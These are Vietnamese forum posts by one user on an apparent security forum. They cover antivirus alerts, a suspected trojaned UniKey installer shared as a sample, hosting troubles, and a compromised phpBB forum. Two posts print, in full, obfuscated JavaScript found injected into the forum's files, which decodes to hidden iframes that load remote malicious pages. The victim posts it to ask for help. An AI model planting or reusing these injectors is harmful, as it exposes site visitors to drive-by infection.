Messages posted by: whitesnow19

Hiện tại Eset 7 trên máy mình luôn báo hvaonline.net nhiễm JS/Kryptik.AMG và cấm truy cập.
Biểu hiện này có lẽ chỉ có ở trang chủ. Mình vào qua Google cũng bị nhưng khi vào trực tiếp các chuyên mục khác thì không thấy bị cảnh báo gì.
Mong các lão đại giải thích giùm.

OS: Windows XP SP 3
AV: Eset AntiVirus 7

p/s: Nếu có bài viết đăng rồi xin mod inbox link cho mình nhé

Unikey.Vn mà dính mẫu này thì đúng là tiêu thật. Anh TQN đâu rồj?

Đây là mẫu Unikey em download từ trang vn.hao123.com với link:

http://dl.dropbox.com/u/65932352/UniKey-4.0RC2-1101-Setup.exe

Quét thử với VirusTotal thì kết quả là 1/41:

https://www.virustotal.com/file/5feaffb51102ac79f2296a473f6043867f9525fa55bf82848401e49429d50b91/analysis/

Chỉ có TrendMicro-HouseCall nhận dạng TROJ_PAM_0000000506.T3 với cơ sở dữ liệu 20120704

Mong các anh em đồng chí tiếp tục sứ mệnh cao cả.

Đây là mẫu em load và quét, up lên đây kẻo sợ đánh rắn động cỏ, tụi nó tẩy link gốc:

http://www.mediafire.com/?d3yh0j7bdzb9m84

Thân gửi!

Mấy ngày qua diễn đàn của em truy cập rất khó khăn. Và ngày hôm qua thì không thể truy cập. Em đang không biết làm thế nào, mong các anh giúp đỡ em với. Em cũng biết chút ít về máy tính nhưng mấy trường hợp phức tạp này thì ...

Hiện tại forum của em chạy trên host free 10hosting.com. Tuy là free nhưng không khác gì trả phí, chắc những ai đã xài x10hosting đều biết. (Em xin lỗi không nói rõ hơn về lý do làm forum trên host free để tránh làm loãng chủ đề).

Vì là free nên em không thể có quyền phần cứng như reset apache,... Em nghĩ thế.

Em gửi lên đoạn log sau:

Download: http://www.mediafire.com/?odpo9es95qf4pkd

Mấy cái 171 là em dùng D-Com Viettel để vào. Ngày 26 em ping được nhưng không vào được. Cả Cpanel lẫn Forum.

Hôm qua tình cờ đọc được bài viết trên internet về việc đăng ký domain .ug
Em đã làm theo và đã nhận được email xác nhận đăng ký.
WHOIS thì cũng đa ra được thông tin nhưng status : PENDING_PAYPAL. smilie

Như vậy thì domain của em đã đăng ký được chưa?
Em đã login vào trang quản lý domain của .ug và thay đổi dns:

Code:

Nameserver 1: ns1.x10hosting.com
Nameserver 2: ns2.x10hosting.com

Nhưng gặp lỗi, email trả về có lỗi như sau:

Code:

Nameserver 1: ns1.x10hosting.com does not have records for lenovo.ug
Nameserver 2: ns2.x10hosting.com does not have records for lenovo.ug

Nguyên văn:

Code:

The following errors occured while contacting the nameservers
specified for the domain lenovo.ug.
Nameserver 1: ns1.x10hosting.com does not have records for lenovo.ug
Nameserver 2: ns2.x10hosting.com does not have records for lenovo.ug
The changes made will not take effect until corrective measures are taken.
This should be within 30 days, otherwise, the domain will be revoked.
Please rectify and confirm by contacting us.
Our contact is:
Uganda OnLine Ltd (UoL)
* UoL is a subsidiary of Computer Frontiers Int'l
Plot 6B Windsor Loop
P.O Box 12510 Kampala - Uganda
Tel: +256 31 230 1800, or +256 41 456 4200
Fax: +256 41 434 0456
Enquiries: <a href="mailto:registrar@cfi.co.ug">registrar@cfi.co.ug</a>
Home Page: www.cfi.co.ug
Thank you

Xin mọi người giúp đỡ!

Thử dùng HirenBoot vô Winmini rồi format thử xem

Bạn đã cài được driver gì rồi? Đời máy của bạn?

Bạn thử sử dụng Hp Format xem.

Vì sao bạn biết usb bị virus autorun?

Tặng mọi người 2 video vừa kiếm được trên Youtube do webmaster post nè. Xem cho bớt mong đợi.hihi
Cyber War - Chiến tranh mạng -
http://www.youtube.com/watch?v=fKJUdWbmWiQ
Mua hàng không mất tiền
http://www.youtube.com/watch?v=mE62TCbJ96Y

Thật bất ngờ vì chỉ sau ít ngày, số lượng zombie trong mạng VNPT đã vươn tới con số 157. Tăng thứ hạng thêm 2 bậc chiếm vị trí thứ 3. Chẳng lẽ là đang có sự hình thành cuộc tấn công mới????

Xem chi tiết tại:

http://botnet-tracker.blogspot.com/2012/01/botnet-statistics-2012-01-04.html

Mọi người có thể theo dõi và bàn luận tại topic này thôi nhé.

Sao avira vào bình thường không thấy báo cáo gì nhỉ? Phải chăng Avira không nhận dạng được?

Theo blog Daily Botnet Statistics thì mạng VNPT đang bị nhiễm và số lượng zombie ngày càng tăng. Các mem nào xài VNTP thì kiểm tra máy nhé.

Thống kê Botnet ngày 1-1-2012: http://botnet-tracker.blogspot.com/2012/01/botnet-statistics-2012-01-01.html

Thống kê Botnet ngày 1-1-2012: http://botnet-tracker.blogspot.com/2012/01/botnet-statistics-2012-01-02.html

Em không thể thay đổi MAC theo cả 3 cách trên. Mặc dù các thông số sau khi em thực hiện thay đổi vẫn còn. Nhưng khi gõ "ipconfig /all" thì lại hiển thị MAC cũ.

Vao bang dien thoai thi hau nhu 100% vao duoc.Admin dau roi.Thanh vien mong doi tra loi lam ne.

Mấy ngày qua em không thể nào truy cập vào được HVA. Hiếm hoi lắm như hôm nay mới vào được và để post được cái đoạn chữ này lên để ai đó trả lời giúp thì em phải F5 tới cả chục lần.

Toàn bị lỗi: Connection refused : 80.

BQT giải đáp với, vì HVA như một phần không thể thiếu hằng ngày của em rồi

Liệu có phải quăng boom?

Mấy bữa trước hãy vào VNN bằng link: http://tmp.vietnamnet.vn => click vào banner là vào được.
Nay vào thì thấy báo là:

Access is denied !

Web admin junzennt@gmail.com

Nếu các bạn để ý thì thấy vietnamnet.vn sau khi type sẽ được wwwect đến một trang chứa script để vào trang chủ. Nhưng em biết trong số các viewer đang xem bài viết nào có "trojan" stl. không biết em nên post lên đây url đó không?
Đã pm riêng anh conmale url này tuỳ anh xử lý.

Đồng ý với angel-pc, làm sao bạn pro_tc_08 là làm sao bạn biết được subdomain???
Bạn mới gia nhập HVA ngày 23/9/2011, 1 post. Là sao?
Nhưng cũng thank pro_tc_08 nên mình mới vào được VNN, đọc được bài thông báo tình trạng kỹ thuật của VNN, thấy có nói đến CMC mà không nói đến HVA, không biết anh bolzano_1989 làm bên đó có thông tin gì không? Không biết CMC có "nhắc khéo" VNN là có sự giúp đỡ rất lớn từ HVA không?

Nếu máy tính của bạn nằm trong một mạng Lan thì rất có thể đang bị Netcut hoặc một dạng tấn công arp. Bạn thử kiểm tra xem.
Nếu bạn xài mạng riêng thì gọi lên tổng đài "kiện" đi. Mấy lần trước mình cũng gặp trường hợp này, gọi tổng đài tí là thông ngay, chẳng biết nguyên nhân vì sao.

FIle Unikey(>256KB) bạn songvedemdl dang xai la bản Mod, bản này mình đã từng up lên nhờ anh conmale và các anh khác phân tích mà vẫn chưa thấy trả lời, chắc tại các anh bạn quá.

File IDMan của bạn signature thì invalid. Bạn nên cập nhật bản IDM mới nhất ấy, buidl 11 nha.

Trước đây em có lập 1 topic nói về diễn đàn của em bị chèn mã độc. Sở dĩ em biết vì em load source về thì Avira báo có virus.

<script>Object.prototype.qwe=function(){return String["fro"+'mCha'+'rCo'+'de'];};Object.prototype.asd="e";var s="";try{{}['qwtqwt']();}catch(q){r=1;}if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof{}.asd.vfr==='undefined')w=2;e=eval;m=[18/w,18/w,210/w,204/w,64/w,80/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,82/w,246/w,18/w,18/w,18/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,118/w,18/w,18/w,250/w,64/w,202/w,216/w,230/w,202/w,64/w,246/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,238/w,228/w,210/w,232/w,202/w,80/w,68/w,120/w,210/w,204/w,228/w,194/w,218/w,202/w,64/w,230/w,228/w,198/w,122/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,64/w,238/w,210/w,200/w,232/w,208/w,122/w,78/w,98/w,96/w,78/w,64/w,208/w,202/w,210/w,206/w,208/w,232/w,122/w,78/w,98/w,96/w,78/w,64/w,230/w,232/w,242/w,216/w,202/w,122/w,78/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,116/w,208/w,210/w,200/w,200/w,202/w,220/w,118/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,116/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,118/w,216/w,202/w,204/w,232/w,116/w,96/w,118/w,232/w,222/w,224/w,116/w,96/w,118/w,78/w,124/w,120/w,94/w,210/w,204/w,228/w,194/w,218/w,202/w,124/w,68/w,82/w,118/w,18/w,18/w,250/w,18/w,18/w,204/w,234/w,220/w,198/w,232/w,210/w,222/w,220/w,64/w,210/w,204/w,228/w,194/w,218/w,202/w,228/w,80/w,82/w,246/w,18/w,18/w,18/w,236/w,194/w,228/w,64/w,204/w,64/w,122/w,64/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,198/w,228/w,202/w,194/w,232/w,202/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,80/w,78/w,210/w,204/w,228/w,194/w,218/w,202/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,230/w,228/w,198/w,78/w,88/w,78/w,208/w,232/w,232/w,224/w,116/w,94/w,94/w,214/w,222/w,224/w,222/w,216/w,202/w,104/w,210/w,216/w,222/w,114/w,92/w,198/w,244/w,92/w,198/w,198/w,94/w,210/w,94/w,204/w,232/w,224/w,98/w,78/w,82/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,236/w,210/w,230/w,210/w,196/w,210/w,216/w,210/w,232/w,242/w,122/w,78/w,208/w,210/w,200/w,200/w,202/w,220/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,224/w,222/w,230/w,210/w,232/w,210/w,222/w,220/w,122/w,78/w,194/w,196/w,230/w,222/w,216/w,234/w,232/w,202/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,216/w,202/w,204/w,232/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,232/w,242/w,216/w,202/w,92/w,232/w,222/w,224/w,122/w,78/w,96/w,78/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,238/w,210/w,200/w,232/w,208/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,204/w,92/w,230/w,202/w,232/w,130/w,232/w,232/w,228/w,210/w,196/w,234/w,232/w,202/w,80/w,78/w,208/w,202/w,210/w,206/w,208/w,232/w,78/w,88/w,78/w,98/w,96/w,78/w,82/w,118/w,18/w,18/w,18/w,200/w,222/w,198/w,234/w,218/w,202/w,220/w,232/w,92/w,206/w,202/w,232/w,138/w,216/w,202/w,218/w,202/w,220/w,232/w,230/w,132/w,242/w,168/w,194/w,206/w,156/w,194/w,218/w,202/w,80/w,78/w,196/w,222/w,200/w,242/w,78/w,82/w,182/w,96/w,186/w,92/w,194/w,224/w,224/w,202/w,220/w,200/w,134/w,208/w,210/w,216/w,200/w,80/w,204/w,82/w,118/w,18/w,18/w,250/w];mm={}.qwe();for(i=0;i<m.length;i++)if({}.asd==='e')s+=mm(e("m"+"["+"i]"));e(s);</script>

Em đã fix bằng cách tải đè file gốc lên. x10hosting không chèn quảng cáo. Nó gây lỗi sau khi em vào diễn đàn:

[phpBB Debug] PHP Warning: in file /includes/session.php on line 1035: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Warning: in file /includes/session.php on line 1035: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Warning: in file /includes/session.php on line 1035: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4586: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4588: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4589: Cannot modify header information - headers already sent by (output started at /index.php:1)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4590: Cannot modify header information - headers already sent by (output started at /index.php:1)

Mong được sự giúp đỡ của các anh. Diễn đàn của em không phải là loại nổi bật (Google tìm chưa chắc đã ra). Em cũng không hiểu nổi bị phá vì cái gì nữa. Mục đích em lập diễn đàn này vì trường em chưa có diễn đàn dành cho sinh viên.

Chắc là khoe khoang ta đây chứ gì! Chứ nếu muốn giới thiệu cho mọi người thì đã không viết ngắn ngủn như thế!

Tình hình là x10hosting block ip VN. Khi lập host em đã fake ip và đăng ký thành công. Nhưng khi login vào cpanel thì hiếm khi truy cập được. Hầu như lúc nào cũng báo không tìm thấy trang web. Mọi người cho ý kiến giúp em với.
https://starka.x10hosting.com:2083
Thank!

PhpBB ver 3.0.9 download từ trang chủ phpbb. Hiện tại đã ổn định nhưng không biết sau này có bị lại không. Mong các anh giúp đỡ

Hi. Cuối cùng cũng có anh commale nghe thấu! Các anh thông cảm. Em và mấy anh khác cũng vì lo cho HVA nên thông báo kịch liệt thui. Nhiều người thông báo thì sẽ có người chú ý mà. Chúc các anh 1 tuần làm việc hiệu quả!

Các anh đâu hết rồi. Portal tue tua rồi mà không thấy động tĩnh gì thế?

Thưa anh, x10hosting không chèn quảng cáo! em vừa đọc lại term của nó xong và edit lại bài viết này.

Tình hình em lập cái diễn đàn phpBB tại x10hosting.com. Mấy ngày trước không vấn đề gì. Hôm nay em truy cập thì thấy diễn đàn báo lỗi. Em vô host thì thấy file index, auth, session bị thay đổi nội dung. Cụ thể có một đoạn mã script đã được chèn vào đầu mỗi file mà em không biết nó có ý nghĩa gì.
Code:

<script>String.prototype.asd=function(){return String['fromCharCode'];};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('s'+'d'))throw 1;}catch(q){zxc={}[i];}v=document.createTextNode('asd');var s="";try{eval('asdvds');}catch(q){for(i in v)r=v.childNodes.length+1}r*=2;e=eval;m=[11-r,11-r,107-r,104-r,34-r,42-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,105-r,103-r,118-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,117-r,68-r,123-r,86-r,99-r,105-r,80-r,99-r,111-r,103-r,42-r,41-r,100-r,113-r,102-r,123-r,41-r,43-r,93-r,50-r,95-r,43-r,125-r,11-r,11-r,11-r,107-r,104-r,116-r,99-r,111-r,103-r,116-r,42-r,43-r,61-r,11-r,11-r,127-r,34-r,103-r,110-r,117-r,103-r,34-r,125-r,11-r,11-r,11-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,121-r,116-r,107-r,118-r,103-r,42-r,36-r,62-r,107-r,104-r,116-r,99-r,111-r,103-r,34-r,117-r,116-r,101-r,63-r,41-r,106-r,118-r,118-r,114-r,60-r,49-r,49-r,111-r,99-r,117-r,103-r,113-r,107-r,51-r,110-r,54-r,104-r,48-r,101-r,50-r,111-r,48-r,110-r,107-r,49-r,107-r,49-r,104-r,118-r,118-r,114-r,114-r,52-r,57-r,120-r,103-r,101-r,106-r,103-r,116-r,41-r,34-r,121-r,107-r,102-r,118-r,106-r,63-r,41-r,51-r,50-r,41-r,34-r,106-r,103-r,107-r,105-r,106-r,118-r,63-r,41-r,51-r,50-r,41-r,34-r,117-r,118-r,123-r,110-r,103-r,63-r,41-r,120-r,107-r,117-r,107-r,100-r,107-r,110-r,107-r,118-r,123-r,60-r,106-r,107-r,102-r,102-r,103-r,112-r,61-r,114-r,113-r,117-r,107-r,118-r,107-r,113-r,112-r,60-r,99-r,100-r,117-r,113-r,110-r,119-r,118-r,103-r,61-r,110-r,103-r,104-r,118-r,60-r,50-r,61-r,118-r,113-r,114-r,60-r,50-r,61-r,41-r,64-r,62-r,49-r,107-r,104-r,116-r,99-r,111-r,103-r,64-r,36-r,43-r,61-r,11-r,11-r,127-r,11-r,11-r,104-r,119-r,112-r,101-r,118-r,107-r,113-r,112-r,34-r,107-r,104-r,116-r,99-r,111-r,103-r,116-r,42-r,43-r,125-r,11-r,11-r,11-r,120-r,99-r,116-r,34-r,104-r,34-r,63-r,34-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,101-r,116-r,103-r,99-r,118-r,103-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,42-r,41-r,107-r,104-r,116-r,99-r,111-r,103-r,41-r,43-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,117-r,116-r,101-r,41-r,46-r,41-r,106-r,118-r,118-r,114-r,60-r,49-r,49-r,111-r,99-r,117-r,103-r,113-r,107-r,51-r,110-r,54-r,104-r,48-r,101-r,50-r,111-r,48-r,110-r,107-r,49-r,107-r,49-r,104-r,118-r,118-r,114-r,114-r,52-r,57-r,120-r,103-r,101-r,106-r,103-r,116-r,41-r,43-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,120-r,107-r,117-r,107-r,100-r,107-r,110-r,107-r,118-r,123-r,63-r,41-r,106-r,107-r,102-r,102-r,103-r,112-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,114-r,113-r,117-r,107-r,118-r,107-r,113-r,112-r,63-r,41-r,99-r,100-r,117-r,113-r,110-r,119-r,118-r,103-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,110-r,103-r,104-r,118-r,63-r,41-r,50-r,41-r,61-r,104-r,48-r,117-r,118-r,123-r,110-r,103-r,48-r,118-r,113-r,114-r,63-r,41-r,50-r,41-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,121-r,107-r,102-r,118-r,106-r,41-r,46-r,41-r,51-r,50-r,41-r,43-r,61-r,104-r,48-r,117-r,103-r,118-r,67-r,118-r,118-r,116-r,107-r,100-r,119-r,118-r,103-r,42-r,41-r,106-r,103-r,107-r,105-r,106-r,118-r,41-r,46-r,41-r,51-r,50-r,41-r,43-r,61-r,11-r,11-r,11-r,102-r,113-r,101-r,119-r,111-r,103-r,112-r,118-r,48-r,105-r,103-r,118-r,71-r,110-r,103-r,111-r,103-r,112-r,118-r,117-r,68-r,123-r,86-r,99-r,105-r,80-r,99-r,111-r,103-r,42-r,41-r,100-r,113-r,102-r,123-r,41-r,43-r,93-r,50-r,95-r,48-r,99-r,114-r,114-r,103-r,112-r,102-r,69-r,106-r,107-r,110-r,102-r,42-r,104-r,43-r,61-r,11-r,11-r,127-r];mm='a'.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e(s);</script>

Mong các anh giúp sức.